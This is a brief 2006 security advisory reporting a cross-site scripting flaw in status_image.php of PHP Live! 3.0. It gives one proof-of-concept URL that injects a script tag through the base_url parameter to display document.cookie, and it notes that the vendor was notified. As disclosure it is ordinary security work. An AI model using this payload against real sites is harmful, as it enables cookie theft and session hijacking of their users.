PHP Live! 3.0 suffers from XSS in status_image.php.
34e8bfbf37cc8f4b08ab9bbb61900ada026b59bdb97d451be810b4b8cc75abc3
Date: 03/22/2006
Vendor: OSI Codes
Product: PHP Live!
Versions: tested 3.0
Vulnerability: Cross Site Scripting
Location: status_image.php
Exploit: /phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script>
Stumbled across this while auditing a web server, vendor has been notified.
--K-sPecial